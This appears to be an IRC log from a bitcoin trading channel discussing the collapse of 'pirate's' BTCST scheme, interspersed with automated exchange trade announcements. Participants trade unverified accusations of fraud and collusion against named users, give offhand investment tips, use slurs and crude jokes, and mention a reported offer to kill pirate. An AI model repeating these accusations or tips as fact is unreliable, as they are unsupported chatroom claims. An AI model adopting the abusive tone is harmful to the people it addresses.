100k mortgage would cost you 2500 a week in interests, at least Aug 29 06:01:20 [GLBSE] [JTME] 1 @ 0.9449 BTC [-] Aug 29 06:01:29 plus deflation, it gets painful Aug 29 06:01:33 I know Aug 29 06:01:54 I would have no problem paying back a usd loan, but a btc loan is another story Aug 29 06:02:19 [GLBSE] [JTME] 2 @ 0.9449 = 1.8898 BTC [-] Aug 29 06:02:51 not exactly Aug 29 06:03:22 I don't have a job Aug 29 06:03:37 why would they lend to pirate Aug 29 06:03:45 He doesn't want a bitcoin loan anyway... Aug 29 06:03:53 renting is no way to make immediate income, they are money pits at first Aug 29 06:04:16 ic3d: in the short term yes Aug 29 06:04:36 Pirate may be facing racconteering charges and to lessen his prison term he is working with the feds to get as much info as possible. Aug 29 06:04:40 so kakobrekla, if i set up a link, i'll be charged 20 satoshi a week? Aug 29 06:04:42 raconteuring!!! Aug 29 06:04:47 ahahah that's the best thing i read all week. Aug 29 06:04:51 currently yes Aug 29 06:04:52 ic3d: how would i not realize that Aug 29 06:04:55 he's up on charges of telling stories. Aug 29 06:05:19 ic3d: thanks for the advice Aug 29 06:05:22 smickles, first tx each 7 days will be charged small fee Aug 29 06:05:29 free advice, its worth it! Aug 29 06:05:32 kakobrekla: ah Aug 29 06:05:52 well ideally they would be extracting money from someone other than me Aug 29 06:05:54 but yeah Aug 29 06:05:56 ic3d: I rent a three bedroom house with my GF in an expensive area Aug 29 06:06:02 smickles, pay one fee, send as many for free for 7 days Aug 29 06:06:03 kakobrekla: if i don't use it for 3 weeks, do i get 3x fees on that first one? Aug 29 06:06:08 no Aug 29 06:06:09 ic3d: we have rental properties in the family, we have gone through evictions Aug 29 06:06:12 i know Aug 29 06:06:18 just 1 time fee Aug 29 06:06:34 my family is doing ok bro Aug 29 06:06:37 chill Aug 29 06:07:04 ic3d: so what is the magical investment i should make? Aug 29 06:07:13 BTCHero: piratae Aug 29 06:07:32 ;;ticker Aug 29 06:07:33 Best bid: 10.88967, Best ask: 10.999, Bid-ask spread: 0.10933, Last trade: 10.99901, 24 hour volume: 61180, 24 hour low: 10.5, 24 hour high: 11.20999 Aug 29 06:07:48 uh, so dump money into bitcoin is your investment strategy? Aug 29 06:07:53 [GLBSE] [FOO.PPPPT] 50 @ 0.249 = 12.45 BTC [+] Aug 29 06:07:56 Yes Aug 29 06:07:58 lol Aug 29 06:07:59 Ewww Aug 29 06:08:03 What the hell Aug 29 06:08:11 Why Aug 29 06:08:14 Would you do that Aug 29 06:08:15 good idea, i will put boxes of cash in the attic Aug 29 06:08:19 actually dumping fiat into btc isn't too bad a strategy Aug 29 06:08:21 great investment Aug 29 06:08:34 i did that for months. Aug 29 06:08:54 I will not be taking US-anything for my ammo, foodstuffs and other things when the economy collapses Aug 29 06:08:59 US is inflating fast, I don't see it getting worth more Aug 29 06:09:00 Unless it is gold or silver Aug 29 06:09:02 [GLBSE] [TYGRR.BOND-P] 1 @ 0.17010001 BTC [-] Aug 29 06:09:04 [GLBSE] [TYGRR.BOND-P] 40 @ 0.1701 = 6.804 BTC [-] Aug 29 06:09:05 [GLBSE] [TYGRR.BOND-P] 1 @ 0.17000001 BTC [-] Aug 29 06:09:06 [GLBSE] [TYGRR.BOND-P] 58 @ 0.17 = 9.86 BTC [-] Aug 29 06:09:22 That USD is losing value Aug 29 06:09:24 ic3d: lost all credibility when he suggested to hold onto usd as investment advice Aug 29 06:09:26 oh, the homes Aug 29 06:09:27 Because there are too many homes Aug 29 06:09:32 The home market crashed Aug 29 06:09:51 ic3d: lost all credibility when he suggested to hold onto usd as investment advice <<< no, actually, when he was playing the 10k usd hitman. Aug 29 06:09:59 oh yeah Aug 29 06:10:01 that too Aug 29 06:10:04 ic3d: Are you that Navy Seal that was frothing at the mouth and going USA USA USA on #bitcoin? Aug 29 06:10:18 buys less stocks and cars... Aug 29 06:10:43 You know Aug 29 06:10:55 Because the government is fucking printing money like crazy to try to fix the economy by sending money to patch everything Aug 29 06:10:55 It's going to be fun to watch Matthew go from urban riches to rags Aug 29 06:11:24 BTC_Mining: False. Money is printed by contract through the Federal Reserve which is a independent organization. Aug 29 06:11:32 Said money is lent Aug 29 06:11:34 at interest Aug 29 06:11:36 [GLBSE] [TYGRR.BOND-P] 1 @ 0.18 BTC [+] Aug 29 06:11:38 [GLBSE] [TYGRR.BOND-P] 55 @ 0.18 = 9.9 BTC [+] Aug 29 06:11:38 mircea_popescu: I could see his points against rental properties though, they made sense Aug 29 06:11:39 [GLBSE] [TYGRR.BOND-P] 541 @ 0.17 = 91.97 BTC [-] Aug 29 06:11:51 just a little extreme Aug 29 06:11:53 Yes, most money is digital. Aug 29 06:11:58 BTCHero 8ball makes sense 50% of the time. Aug 29 06:12:05 Ah Aug 29 06:12:25 do you guys think ron paul can become president? Aug 29 06:12:28 Well maybe, but that's risky Aug 29 06:12:31 once the debt starts contracting.... Aug 29 06:12:37 when is this going to happen? Aug 29 06:12:40 blazing too old by now. Aug 29 06:12:46 [GLBSE] [TYGRR.BOND-P] 56 @ 0.17 = 9.52 BTC [-] Aug 29 06:12:48 [GLBSE] [TYGRR.BOND-P] 35 @ 0.125 = 4.375 BTC [-] Aug 29 06:12:50 blazing: The RNC took his plurality away. Aug 29 06:12:58 He could of had a chance Aug 29 06:13:06 but the RNC took away the 10 delegates necessary. Aug 29 06:13:51 People have gone as far as to call the RNC the Third Reich over this. Aug 29 06:14:04 Lesson? Don't be a libertarian in the RNC or they will fuck you up. Aug 29 06:14:12 End the Fed Aug 29 06:14:22 [GLBSE] [TYGRR.BOND-P] 10 @ 0.125 = 1.25 BTC [-] Aug 29 06:14:23 ic3d: you should probably be on meds Aug 29 06:14:33 i sense some serious issues Aug 29 06:14:33 After auditing it and arresting the bankers Aug 29 06:14:48 They all need to be arrested for treason. Aug 29 06:14:50 ;;rate pirateat40 -1 ran a typical ponzi. Aug 29 06:14:51 Rating entry successful. Your rating of -1 for user pirateat40 has been recorded. Aug 29 06:14:56 Executive Branch Aug 29 06:15:00 Executes the law Aug 29 06:15:06 Runs the military Aug 29 06:15:12 Of course Aug 29 06:15:22 but the fed is probably breaking the law Aug 29 06:15:38 With enough maddened citizenry Aug 29 06:15:42 anything can happen Aug 29 06:15:42 [GLBSE] [TYGRR.BOND-P] 1 @ 0.15 BTC [+] Aug 29 06:15:43 [GLBSE] [TYGRR.BOND-P] 87 @ 0.13 = 11.31 BTC [-] Aug 29 06:15:44 [GLBSE] [TYGRR.BOND-P] 5 @ 0.1 = 0.5 BTC [-] Aug 29 06:15:44 [GLBSE] [TYGRR.BOND-P] 1 @ 0.09 BTC [-] Aug 29 06:15:45 [GLBSE] [TYGRR.BOND-P] 50 @ 0.09 = 4.5 BTC [-] Aug 29 06:15:46 [GLBSE] [TYGRR.BOND-P] 50 @ 0.08 = 4 BTC [-] Aug 29 06:15:50 You go in with pitch forks Aug 29 06:15:53 and firearms Aug 29 06:16:01 Alex Jones did Aug 29 06:16:03 lol Aug 29 06:16:14 *rolls eyes* Aug 29 06:16:21 Okay, sure, pal. Aug 29 06:16:35 Money is lent at interest Aug 29 06:16:41 mircea_popescu: I don't really care :) Aug 29 06:16:45 [GLBSE] [TYGRR.BOND-P] 6 @ 0.08 = 0.48 BTC [-] Aug 29 06:16:53 I feel bad for those who do though Aug 29 06:16:53 Where that interest goes Aug 29 06:16:56 is the problem. Aug 29 06:17:02 weak sauce. Aug 29 06:17:07 You think it does. Aug 29 06:17:17 A portion certainly does. Aug 29 06:17:32 [GLBSE] [MOORE] 25 @ 0.5 = 12.5 BTC [+] Aug 29 06:17:32 copumpkin: can you cash out some of your bitcoins and make me a 75k usd loan please? Aug 29 06:17:35 dude prisonplanet told EmanuelDeOrtego everything Aug 29 06:17:38 But we are forgetting about the profits that come from the money that is lent out. Aug 29 06:17:41 BTCHero: no thanks Aug 29 06:17:49 he knows man Aug 29 06:17:51 BTCHero: gonna be a little more cautious for the time being :) Aug 29 06:17:51 he knows Aug 29 06:17:54 ill ask again at 15 Aug 29 06:17:58 BTCHero: I'll get back to ponzis next week Aug 29 06:18:18 We're dealing with a monster. Aug 29 06:18:38 no i need a rental property, this isn't a ponzi Aug 29 06:18:48 i promise i won't lose more than 40% of your money Aug 29 06:19:19 ic3d: again, thanks for the advice Aug 29 06:20:18 correct, correct, wrong Aug 29 06:20:38 "you have to rent yourself in the fiat labor market place as a slave." Aug 29 06:20:42 so much truth Aug 29 06:21:07 lol, such loaded language all the fucking time Aug 29 06:21:13 tyranny, slave, violence Aug 29 06:21:14 ic3d: i don't have a job Aug 29 06:21:22 any other good ones you have? Aug 29 06:21:30 he needs some meds copumpkin Aug 29 06:21:37 you should teach him to be more like you Aug 29 06:21:38 Jobs are for people who don't have a life. Aug 29 06:21:38 oh yes yes Aug 29 06:21:40 good job Aug 29 06:21:48 EmanuelDeOrtego: I have a pretty decent life, I think Aug 29 06:22:46 ic3d: Am I being rented out if I work with a group of people to get something done? Aug 29 06:23:32 copumpkin: smells like libertard Aug 29 06:23:50 libertarian appears to be the new 'emo' Aug 29 06:23:50 ic3d: how do you get money? Aug 29 06:24:03 pretty sure they have the fringe and everything Aug 29 06:24:06 so wait, do I not have a life? Aug 29 06:24:10 I think we are dealing with a communist here. Aug 29 06:24:13 where did you get your capital? Aug 29 06:24:23 [GLBSE] [PLATINUM] 269 @ 0.009 = 2.421 BTC [-] Aug 29 06:24:35 theres the other kind though Aug 29 06:24:43 I am a Egoist, thank you. Aug 29 06:24:46 two kinds of libertard Aug 29 06:25:00 theres the, moms mininvan is oppressing my rights form Aug 29 06:25:14 and the I'm hoarding wild turkey and ammo form Aug 29 06:25:28 so I guess I don't have a life Aug 29 06:25:31 damn Aug 29 06:25:40 copumpkin: I was jokin around. Aug 29 06:25:43 ic3d: ok cool Aug 29 06:25:47 no no, you're right Aug 29 06:25:51 I just realized I don't have a life Aug 29 06:25:57 this is troubling Aug 29 06:25:59 Just work part time Aug 29 06:26:04 Get it balanced out Aug 29 06:26:05 I just lost tens of thousands of bitcoins, and I don't have a life Aug 29 06:26:11 the horror! Aug 29 06:26:12 : ( Aug 29 06:26:15 I don't have a life either Aug 29 06:26:19 ic3d: oh, clever Aug 29 06:26:24 :) Aug 29 06:26:34 im spending this weekend underwater hunting ffs Aug 29 06:26:42 I go to class and get told my combat boots care people : ( Aug 29 06:26:43 for shit im going to eat Aug 29 06:26:46 ic3d: you are in the bitcoin universe Aug 29 06:26:50 right now as we speak Aug 29 06:26:51 [GLBSE] [NYAN.C] 10 @ 0.26 = 2.6 BTC [-] Aug 29 06:27:01 scare* Aug 29 06:27:05 Go get one then Aug 29 06:27:16 I'm renting (GASP) a holiday home Aug 29 06:27:32 [GLBSE] [MMM] 3 @ 0.9 = 2.7 BTC [+] Aug 29 06:27:53 I just don't think people should work over 30 hours a week in today's industrialized society Aug 29 06:27:56 i plan on living vicariously through my child Aug 29 06:28:00 nah, actually, now that I think about it Aug 29 06:28:01 [GLBSE] [TYGRR.BOND-P] 4 @ 0.071 = 0.284 BTC [-] Aug 29 06:28:03 [GLBSE] [TYGRR.BOND-P] 10 @ 0.071 = 0.71 BTC [-] Aug 29 06:28:04 [GLBSE] [TYGRR.BOND-P] 100 @ 0.061 = 6.1 BTC [-] Aug 29 06:28:04 I have a pretty awesome life Aug 29 06:28:05 [GLBSE] [TYGRR.BOND-P] 2 @ 0.05401337 = 0.108 BTC [-] Aug 29 06:28:06 [GLBSE] [TYGRR.BOND-P] 200 @ 0.042 = 8.4 BTC [-] Aug 29 06:28:07 [GLBSE] [TYGRR.BOND-P] 284 @ 0.041111 = 11.6755 BTC [-] Aug 29 06:28:08 Good. Aug 29 06:28:10 so I'm gonna keep up what I'm doing Aug 29 06:28:14 : ) Aug 29 06:28:17 I suck The Man's cock for a living Aug 29 06:28:18 and I love it Aug 29 06:28:37 I agree with that to an extent Aug 29 06:28:40 [GLBSE] [NYAN.C] 5 @ 0.25 = 1.25 BTC [-] Aug 29 06:28:52 oh I love it for my own reasons Aug 29 06:28:57 his cock is quite tasty Aug 29 06:29:06 I'm going to forget about the money I lost in pirate Aug 29 06:29:15 [MPEX] [S.BVPS] 150 @ 0.00359922 = 0.5399 BTC [+] Aug 29 06:29:16 I haven't had 50% taken Aug 29 06:29:17 by drinking roughly the same dollar value in fine single malt Aug 29 06:29:23 I got out when I had 100% profit Aug 29 06:29:26 dub what's that come to ? Aug 29 06:29:28 You should of too guys Aug 29 06:29:36 You stayed in far too long Aug 29 06:29:38 and I don't really work long hours Aug 29 06:30:05 mircea_popescu: I guess around $4k... I wasn't keeping track of reinvestment Aug 29 06:30:28 that's a lot of whiskey Aug 29 06:30:39 not really Aug 29 06:30:50 take me more than a night at any rate. Aug 29 06:31:28 uh Aug 29 06:31:30 by filling a niche Aug 29 06:31:37 by not relying on production? Aug 29 06:31:39 :P Aug 29 06:31:51 ic3d: the ponzi niche Aug 29 06:31:56 Public guesses was ponzi or money laundering Aug 29 06:32:00 ponzis are great for the bottom level Aug 29 06:32:41 I'm glad you are here with all the answers Aug 29 06:32:46 5-10% over taxes you mean right Aug 29 06:32:49 because nobody has made this point before Aug 29 06:33:01 lol Aug 29 06:33:20 [GLBSE] [CPA] 3 @ 0.07 = 0.21 BTC [-] Aug 29 06:33:29 ic3d: bring on more condescension Aug 29 06:33:29 ic3d: but you can say the money came from selling widgets to tor users Aug 29 06:33:30 [GLBSE] [GIGAMINING] 1 @ 0.8 BTC [-] Aug 29 06:33:36 hear that people? bitcoin is different Aug 29 06:34:00 because you say so? Aug 29 06:34:03 :P Aug 29 06:34:04 why not? Aug 29 06:34:17 ic3d: I'm not sure you're aware, but like the "real world", most bitcoin finance doesn't occur on exchanges Aug 29 06:34:42 There's huge transactions not happening on MtGox... Aug 29 06:34:53 ic3d: yeah, surely nobody has the means to locate buyers Aug 29 06:34:59 therefore, it is impossible! Aug 29 06:35:02 QED Aug 29 06:35:13 but no, I'm mocking Aug 29 06:35:26 I actively deal with people who have way more money/coins than gox could handle comfortably Aug 29 06:35:43 ic3d: you are an expert troll... spanning multiple subjects Aug 29 06:35:47 you keep talking about the exchange Aug 29 06:35:51 when I keep telling you that's irrelevant Aug 29 06:36:19 because many big guys already know each other Aug 29 06:36:24 hmm, so how much do I say I lost in pirate Aug 29 06:36:27 and OTC is more subtle and doesn't have fees Aug 29 06:36:56 put in 200btc maybe 12-13 weeks ago, when they were worth $6-7 Aug 29 06:37:40 ic3d: all I'm saying is that there's a _lot_ of business going on, at scales you have declared impossible, that you don't know about Aug 29 06:37:41 2000 Aug 29 06:37:52 did I lose $1200 or $5000 Aug 29 06:37:59 2000 Aug 29 06:38:21 watch blockchain.info Aug 29 06:38:27 err wait bitcoins aren't worth 10 Aug 29 06:38:33 a lot of the big blocks are change from big addresses Aug 29 06:38:37 many are not though Aug 29 06:38:54 lots happens that would completely dawrf mtgox Aug 29 06:39:19 anyway, it's 5:40 am :) Aug 29 06:39:23 copumpkin dude enough already. you personally are gonna dwarf mtgox nao ? Aug 29 06:39:29 mircea_popescu: not at all! Aug 29 06:39:32 mkay. Aug 29 06:39:44 enough already why? Aug 29 06:40:02 cause i have the idiot you're talking to on ignore and you're starting to sound like him Aug 29 06:40:05 and i dun want to. Aug 29 06:40:08 oh lol Aug 29 06:40:17 sorry, will avoid :) Aug 29 06:40:21 :p Aug 29 06:40:24 I'm on your timezone now! Aug 29 06:40:28 I'm stealin ur timez Aug 29 06:40:34 where that ? Aug 29 06:40:38 near rome Aug 29 06:40:41 ania Aug 29 06:40:43 >_> Aug 29 06:40:44 so drop by have a cup of coffee Aug 29 06:40:48 i can personally cuss you out Aug 29 06:40:52 we'll both feel better. Aug 29 06:40:52 hah, I would except I don't drink coffee Aug 29 06:40:56 sorry man Aug 29 06:41:00 wat Aug 29 06:41:11 life requires coffee Aug 29 06:42:04 i don't really drink coffee either Aug 29 06:42:09 more like a social thing Aug 29 06:42:18 [MPEX] [F.GIGA.ETF] 7000 @ 0.00075123 = 5.2586 BTC [+] Aug 29 06:42:32 ;;ticker Aug 29 06:42:33 Best bid: 10.92, Best ask: 10.9994, Bid-ask spread: 0.07940, Last trade: 10.99941, 24 hour volume: 60962, 24 hour low: 10.5, 24 hour high: 11.20999 Aug 29 06:43:08 [GLBSE] [TYGRR.BOND-P] 82 @ 0.041111 = 3.3711 BTC [-] Aug 29 06:43:10 [GLBSE] [TYGRR.BOND-P] 10 @ 0.04 = 0.4 BTC [-] Aug 29 06:43:43 Wait, you could have just 5 BTC sitting a BTCST account? Aug 29 06:43:44 https://bitcointalk.org/index.php?topic=104257.msg1141903#new Aug 29 06:43:48 sitting in* Aug 29 06:46:27 so its all over Aug 29 06:46:45 finally we can get on with our lives Aug 29 06:50:20 yes Aug 29 06:52:27 Well, he did say that you should never trust a pirate. Aug 29 06:52:31 I mean, go figure. Aug 29 06:54:31 [MPEX] [S.MPOE] 38901 @ 0.00038364 = 14.924 BTC [-] Aug 29 06:54:32 [MPEX] [S.MPOE] 6734 @ 0.00038344 = 2.5821 BTC [-] Aug 29 06:54:33 [MPEX] [S.MPOE] 14765 @ 0.0003834 = 5.6609 BTC [-] Aug 29 06:55:39 i just cant believe all the betting and buying pirate debt that followed...it just topped it off Aug 29 06:56:53 lol Matthew is so screwed Aug 29 06:57:10 He's going to have to dump his girlfriend and live out of a van Aug 29 06:57:35 and he was making fun of me for working a month at Wal-Mart. Aug 29 06:58:03 EmanuelDeOrtego i don't see why you think anything changed. Aug 29 06:58:12 wright was disreputable six months ago Aug 29 06:58:30 he'll keep shooting his mouth as if that wasn't plainly known six months from now. Aug 29 06:58:40 Probably. Aug 29 06:58:55 Anyways, that 100k was probably investor money from either Ellet or Bitcoin magazine. Aug 29 06:59:02 Who knows. Aug 29 06:59:03 or thin air. Aug 29 06:59:09 seeing how he wouldn't escrow. Aug 29 06:59:18 Well, if he doesn't pay that.... Aug 29 06:59:20 Wow. Aug 29 06:59:22 He's done. Aug 29 07:00:17 ya right. Aug 29 07:01:40 u could say that Aug 29 07:02:15 ic3d: the burden of proof is on the positive statement Aug 29 07:02:16 bitcoin needed to go through this i reckon Aug 29 07:02:30 [GLBSE] [GIGAMINING] 1 @ 0.8 BTC [-] Aug 29 07:02:40 its part of its growing up Aug 29 07:02:53 [GLBSE] [GIGAMINING] 1 @ 0.75 BTC [-] Aug 29 07:02:55 [GLBSE] [GIGAMINING] 6 @ 0.7201 = 4.3206 BTC [-] Aug 29 07:02:56 [GLBSE] [GIGAMINING] 4 @ 0.72 = 2.88 BTC [-] Aug 29 07:02:57 [GLBSE] [GIGAMINING] 1 @ 0.7102 BTC [-] Aug 29 07:02:57 blazing i am pretty sure. Aug 29 07:02:58 [GLBSE] [GIGAMINING] 2 @ 0.71001 = 1.42 BTC [-] Aug 29 07:02:58 [GLBSE] [GIGAMINING] 9 @ 0.71 = 6.39 BTC [-] Aug 29 07:03:12 we aren't seeing this kind of mass hysteria any time again i would hope. Aug 29 07:03:12 whats going on with gigamining? Aug 29 07:03:19 blazing people figure he's insolvent prolly. Aug 29 07:03:39 Why would he be insolvant? Aug 29 07:03:53 [MPEX] [F.GIGA.ETF] 13200 @ 0.00075154 = 9.9203 BTC [+] Aug 29 07:03:53 [MPEX] [F.GIGA.ETF] 17300 @ 0.00075123 = 12.9963 BTC [-] Aug 29 07:03:58 pirate association ? Aug 29 07:04:02 im so glad i stayed out of all this glbse and pirate bullshit....trading on gox is fine for me Aug 29 07:04:03 i have no ideea Aug 29 07:04:06 Bitcoin is going up because of this Aug 29 07:04:13 All the investors need their Bitcoins back Aug 29 07:04:23 EmanuelDeOrtego ya it will prolly go up Aug 29 07:04:27 blazing try mpex eh! Aug 29 07:04:31 Matthew, if he pays back on is debt, will need to buy. Aug 29 07:04:40 bet* Aug 29 07:04:48 does mpex have enough volume though Aug 29 07:04:58 i trade with 500-1000btc Aug 29 07:05:03 it does ~5k a day. Aug 29 07:05:09 [GLBSE] [GSDPT] 6 @ 0.0032 = 0.0192 BTC [-] Aug 29 07:06:19 ic3d == ciuciu? Aug 29 07:06:46 it is ?! Aug 29 07:07:01 jesus wow, he managed to get on my ignore in like 15 minutes, on a fresh identity ? Aug 29 07:07:06 this is some serious skill Aug 29 07:07:14 [GLBSE] [PPT.A] 1 @ 0.3615 BTC [-] Aug 29 07:07:42 [GLBSE] [ASICMINER] 50 @ 0.1199 = 5.995 BTC [+] Aug 29 07:07:54 mircea_popescu: you didn't see him trollin' me for about half an hour? Aug 29 07:08:02 nope. Aug 29 07:08:07 this, after he offered to kill pirate for 10kbtc? Aug 29 07:08:14 right about there, lemme find it Aug 29 07:08:35 Aug 29 05:18:49 three month's revenue, solid growth potential et all. Aug 29 07:08:35 Aug 29 05:19:57 all the bitcoin projects are wealth transfering schemes Aug 29 07:08:35 Aug 29 05:20:03 theres no wealth creating investments Aug 29 07:08:35 Aug 29 05:20:09 all economy primarily exists to transfer wealth. Aug 29 07:08:35 Aug 29 05:20:16 no it doesnt Aug 29 07:08:35 Aug 29 05:20:25 what qualifies you to opine on this topic ? Aug 29 07:08:35 Aug 29 05:20:27 a proper economy creates wealth not transfers it Aug 29 07:08:35 Aug 29 05:20:32 mk i had enough Aug 29 07:08:43 is this before or after ? Aug 29 07:09:50 lol Pirate is giving Chaang-Noi orders Aug 29 07:10:07 :) Aug 29 07:10:20 step into the light goat. Aug 29 07:12:39 there is more than just one problem ic3d Aug 29 07:12:51 ;;ticker Aug 29 07:12:51 Best bid: 10.95295, Best ask: 10.9992, Bid-ask spread: 0.04625, Last trade: 10.99921, 24 hour volume: 60933, 24 hour low: 10.5, 24 hour high: 11.20999 Aug 29 07:13:32 kakobrekla: ? Aug 29 07:14:19 [MPEX] [S.MPOE] 3200 @ 0.0003834 = 1.2269 BTC [-] Aug 29 07:18:58 https://bitcointalk.org/index.php?topic=104261.msg1141973#msg1141973 Aug 29 07:19:04 Pirate will be getting the scammer tag Aug 29 07:20:34 It's only symbolic at this point, anyway -- no one's going to be tricked into trading with someone involved in such a high-profile controversy. Aug 29 07:20:38 guy has a pretty good point Aug 29 07:20:45 heck is a tag gonna change ? Aug 29 07:21:27 It's funny Aug 29 07:21:32 and we can all look back at Aug 29 07:21:38 and be nostalgic Aug 29 07:21:58 "the good ole days when we were all professional and shit" Aug 29 07:26:07 "This bond is in no way insured. The money gained from the selling of these bonds will go to BTCST. This bond is not guaranteed but will be honored at best effort." Aug 29 07:26:23 I think Chaang-Noi is fine. Aug 29 07:26:56 would be really funny if pirate started a shakuru play Aug 29 07:27:04 and end up with some dude holding a repayment fund Aug 29 07:27:11 into which he can donate the proceeds of sold riser cables Aug 29 07:27:17 and other 1/4 bitcoin bonanzas Aug 29 07:27:30 lol Aug 29 07:27:32 [GLBSE] [GSDPT] 311 @ 0.0032 = 0.9952 BTC [-] Aug 29 07:28:58 [GLBSE] [NASTY] 1 @ 0.6 BTC [-] Aug 29 07:30:11 i hope this whole pirate thing draws more attention to bitcoin Aug 29 07:30:47 It is fairly common in ponzi scams to create false accounts to give the illusion of popularity. Other people will be more inclined to invest if they think other people believe it works. This costs him nothing or very little, because the money goes back to himself, and they will never be claimed while the scam runs. If they are in the form of extra shares on GLBSE it would be trivial to sell them at a discount now, and somewhat more Aug 29 07:30:47 work if he's sent them through one of the pass-throughs. Aug 29 07:30:52 incidentally, that is a very good point. Aug 29 07:33:17 you mean the passthrough operator is selling them or pirate? Aug 29 07:33:43 they could be in collusion, or the opperators could be just victims. Aug 29 07:33:46 either one works. Aug 29 07:34:28 there;s a pretty solid theory that the guy sold his own debt at cut-down rates for a 2nd round of scamming. it'd make sense. Aug 29 07:34:33 do you think the meeting in vegas may have something to do with this? Aug 29 07:35:02 i have no ideea what the meeting has to do with, i wasn't there Aug 29 07:35:24 blazing i was there Aug 29 07:35:27 but "strategizing" i hear. Aug 29 07:35:33 it was defcon Aug 29 07:35:46 we however had a dinner and then later played some craps Aug 29 07:35:56 everything that was posted online was true Aug 29 07:36:32 i went cuz i wanted to go to vegas and felt, hell why not then, go to defcon and see pirate and giga and some of the people who i had assumed were my freinds Aug 29 07:36:41 . test Aug 29 07:37:15 Chaang-Noi here's the problem as i see it : there's no way for me to verify that you weren't buying your own shares of pirate thing. Aug 29 07:37:33 on the grounds of what liquidity i have seen on glbse, the sorts of numbers you folks were flashing there make no sense. Aug 29 07:37:39 nobody there has 10's of k's to invest. Aug 29 07:37:43 so actually you left vegas with no more information about pirate then when you arrived Aug 29 07:37:57 mircea no one cares what you think :/ or say... Aug 29 07:38:07 nope, and i did not expect to get any Aug 29 07:38:08 Chaang-Noi, so did they turn out not to be your friends? :| Aug 29 07:38:09 if that only were true, you'd be in so much better a position... Aug 29 07:38:22 giga sure, pirate well at this point i think no Aug 29 07:38:27 hmm ok Aug 29 07:39:19 there was not much talk about gpuman or btcst Aug 29 07:39:23 some but nothing new Aug 29 07:39:29 so you went to vegas from thailand at great persona expense and difficulty Aug 29 07:39:35 for the pleasure of playing craps like old ladies. Aug 29 07:39:37 i wasnte dto see defcon and vegas, its why i went Aug 29 07:40:03 your story doth not wash. Aug 29 07:40:41 mircea no one cares what you think :/ or say... Aug 29 07:41:02 if only that were true... your position would be a lot better. Aug 29 07:41:53 fact of the matter is, currently i speak for about 90% of all btc investors left standing. Aug 29 07:42:10 after you and the gang killed half a million bitcoin in the hands of those fools enough to trust you. Aug 29 07:42:13 suicide move, that. Aug 29 07:42:28 [GLBSE] [TYGRR.BOND-PI] 240 @ 0.9999999 = 240 BTC [-] Aug 29 07:43:12 its not dead Aug 29 07:43:28 theres gonna be a lot of hookers and blow Aug 29 07:43:34 MPeX Users: There are over 22K+ S.DICE shares for sale on the GLBSE for .0032. There is a bid for 90k+ S.DICE shares at .0033 on MPeX. DeaDTerra will convert GLBSE shares to MPeX shares with no fee. Aug 29 07:43:54 i guess we see nao if there's anyone willing to trust glbse for umm what is is Aug 29 07:44:01 mircea no one cares what you think :/ or say... Aug 29 07:44:01 .py .0032 * 22000 Aug 29 07:44:02 70.4 Aug 29 07:44:07 a whooping 70 bitcoin. Aug 29 07:44:23 [GLBSE] [BITCOINRS] 1 @ 0.05 BTC [-] Aug 29 07:46:46 [GLBSE] [TEEK.PPT] 1 @ 0.05 BTC [+] Aug 29 07:47:26 [GLBSE] [TEEK.PPT] 9 @ 0.01 = 0.09 BTC [-] Aug 29 07:49:58 [GLBSE] [TYGRR.BOND-P] 150 @ 0.1 = 15 BTC [+] Aug 29 07:50:01 <_matthew_> Why is goat trying to stall payouts to people whom he owes money to? Aug 29 07:50:01 <_matthew_> And if he isn't doing some kind of shady insider bullshit, why wouldn't goat be able to just give that information? Aug 29 07:50:06 Matthew goes full retard Aug 29 07:50:33 o, he's in "let's talk of something else" mode ? Aug 29 07:50:35 tbqh Aug 29 07:51:44 why goat can't just say "9001 bitcoins are my personal shit and 9001 bitcoins are in glbse ppt that I cannot provide individual details for" is beyond me Aug 29 07:51:47 like 10 months Aug 29 07:52:07 dub why would he ? Aug 29 07:52:11 ic3d: He's in deep shit and needs to put the shit on someone else Aug 29 07:52:21 He needs Goat to provide information Aug 29 07:52:22 by screaming bullshit and refusing to even do that he is makign shit worse Aug 29 07:52:36 no, actually, that's the one shred of credibility he has left. Aug 29 07:52:53 ic3d: His shareholders on GLBSE Aug 29 07:52:57 mircea_popescu: because that is what pirate asked for, presumable on legal advise, and assuming he actually wants to payout Aug 29 07:53:13 dub if he is taking legal advice you want the phone of his lawyer Aug 29 07:53:13 * _matthew_ is still betting he's going to pay off Aug 29 07:53:16 and nothing else from him. Aug 29 07:53:59 [MPEX] [F.GIGA.ETF] 10241 @ 0.00076011 = 7.7843 BTC [+] Aug 29 07:54:09 mircea_popescu: so is lawyer is goign to recommend having everyone involved call him Aug 29 07:54:25 (pirates lawyer) Aug 29 07:54:28 Update: Aug 29 07:54:29 I see that I have no obligation to honour Pirates request for information on "sub accounts" Aug 29 07:54:29 Here is why... Aug 29 07:54:29 I have a personal account with BTCST. I have one name (goat) and one BTC address. Aug 29 07:54:29 I do not have a trust account. The status was never changed and I never paid the 500 fee. Aug 29 07:54:29 I have no sub accounts. None at all were ever made. Aug 29 07:54:31 dub no, it's just, if we have a deal we are working on that's fine. if you get your lawyer involved, i will get mine. Aug 29 07:54:31 Pirate when he gave me the request he did so over IRC and not in a formal legally valid way. Aug 29 07:54:33 Pirate did not explain why he needed more information or what would happen if I did not send it or why he had that very odd deadline. Aug 29 07:54:36 Pirate refused to give me his lawyers contact information. Since he is claiming he can not speak because his lawyers will not let him so he is clearly operating in bad faith. He did not even confirm his identity. Aug 29 07:54:39 I can not see why at all I am obligated to give pirate more information to get back coins owed. Aug 29 07:54:41 My personal obligations to GLBSE have nothing to do with Pirate. Aug 29 07:54:43 At this time I will just ignore his request as he can not prove I have these so called "sub accounts". Aug 29 07:54:46 Thank you. Aug 29 07:55:33 well I'm quite glad I sold out of your ppt a long time ago :) Aug 29 07:56:01 it's so sad to see how far this crap got. Aug 29 07:56:13 there was a 500 BTC fee?? Aug 29 07:56:19 it looks to me like pirate fucked up Aug 29 07:56:21 fucken scourge for btc finance. Aug 29 07:56:53 unless all this posturing is just to incite a BTC price crash Aug 29 07:57:08 and buying his own debt cheap Aug 29 07:57:27 the market is going up on the news. Aug 29 07:57:27 [MPEX] [F.GIGA.ETF] 6059 @ 0.00076011 = 4.6055 BTC [+] Aug 29 07:57:28 [MPEX] [F.GIGA.ETF] 7396 @ 0.00076564 = 5.6627 BTC [+] Aug 29 07:57:30 [MPEX] [F.GIGA.ETF] 16592 @ 0.00076892 = 12.7579 BTC [+] Aug 29 07:57:31 [MPEX] [F.GIGA.ETF] 19953 @ 0.00077968 = 15.557 BTC [+] Aug 29 07:58:03 ic3d: both of those are good for him potentially Aug 29 07:58:06 